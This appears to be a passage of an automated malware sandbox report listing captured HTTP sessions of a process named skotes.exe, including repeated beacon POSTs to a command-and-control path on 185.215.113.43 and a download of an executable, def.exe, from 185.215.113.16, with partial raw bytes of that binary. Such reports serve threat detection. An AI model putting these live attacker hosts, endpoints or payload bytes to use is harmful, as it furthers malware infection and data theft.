                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            46192.168.2.450181185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:58.181114912 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:59.614922047 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:59 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            47192.168.2.450186185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:01.359471083 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:02.748261929 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:12:02 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            48192.168.2.450189185.215.113.1680
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:02.385087013 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:03.761465073 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:12:03 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                            Content-Length: 2811392
                                                                                                                                                                                                                                                                                                            Last-Modified: Thu, 21 Nov 2024 10:52:40 GMT
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            ETag: "673f10f8-2ae600"
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 8a f7 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$`+ `@ +*`Ui` @ @.rsrc`2@.idata 8@cpzpcpnh**:@ghvclarm @+*@.taggant@`+"*@
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:03.761539936 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:03.761575937 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:03.761651993 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:03.761698961 CET896INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:03.762001038 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:03.762154102 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:03.762195110 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii: i/P@Au)jQj{E+z#*dgy@+zChpbHS"~ltya5+/v<do|#)
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:03.762248039 CET1236INData Raw: 53 19 bb 06 1d 83 f2 49 e4 23 70 78 1c f7 05 af 50 c1 85 7c 91 b9 29 42 4a d7 9f c7 c5 d7 85 91 13 78 01 47 6d 5e 6e 23 16 d0 b1 61 4f a4 06 7e 4d cc 8a 60 09 a6 60 9f 2f d1 3e 78 80 31 61 43 a9 a5 7f 9b da f1 41 73 29 2c 23 6a 6e 76 e5 92 6f f9
                                                                                                                                                                                                                                                                                                            Data Ascii: SI#pxP|)BJxGm^n#aO~M``/>x1aCAs),#jnvo#"x`9JE"m75qm;x%_~+IFmb:slPqxDCF9ig~zvz0}J^E_&y_zS
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:03.762281895 CET1236INData Raw: 83 b3 c2 64 86 86 78 8d d0 56 b6 a2 f6 ac bd d1 f8 bc 94 c6 1b 94 2b 94 64 8a 73 a0 84 8f 02 a7 e9 d3 51 85 ea d9 fc c1 cd 64 91 c9 ee 36 b1 56 fb bf 90 0b a2 66 79 1d 8e 2f bc 6d cb df b5 04 55 97 95 14 fa 4c a5 a2 3b c6 9b 4b a4 79 93 a4 1f 5e
                                                                                                                                                                                                                                                                                                            Data Ascii: dxV+dsQd6Vfy/mUL;Ky^uTSQx-$fY<aDRaDG@!zL'Q~{:}O=_vv.1qpru^DVf}pN{DR]P&BQ
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:03.885581017 CET1236INData Raw: 7e 8a 2e 20 d4 e4 45 b4 81 1a 78 30 d2 4d fd f2 92 da 6f 72 29 87 5d 5b b3 c1 e1 7a 66 84 7d b0 34 94 b9 38 57 b5 52 6f ff 6b 85 82 4e b9 64 2d 2a 95 77 dd db ba 78 b3 35 e0 31 ba d6 96 d1 6c 3d 73 2b e2 25 23 6a b7 5d a4 f1 6c 4a a5 95 2a 25 9a
                                                                                                                                                                                                                                                                                                            Data Ascii: ~. Ex0Mor)][zf}48WRokNd-*wx51l=s+%#j]lJ*%|WPUk<'{"[>TOrMm@}<=Q|5FIMu}E#bymzpU{l?u]~1q.,Im_~fw~G"_RkD&-S


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            49192.168.2.450192185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:04.401952982 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:05.783843994 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:12:05 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            50192.168.2.450193185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:07.562632084 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:08.902065992 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:12:08 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            51192.168.2.450199185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:12.212202072 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:13.551160097 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:12:13 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            52192.168.2.450203185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:15.185334921 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:16.627194881 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:12:16 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            53192.168.2.450207185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:18.387073040 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            54192.168.2.450216185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:21.290239096 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:22.712294102 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:12:22 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            55192.168.2.450226185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:24.453950882 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:25.850780964 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:12:25 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            56192.168.2.450230185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:27.491185904 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:28.847800970 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:12:28 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            57192.168.2.450233185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:30.584371090 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:31.966947079 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:12:31 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            58192.168.2.450236185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
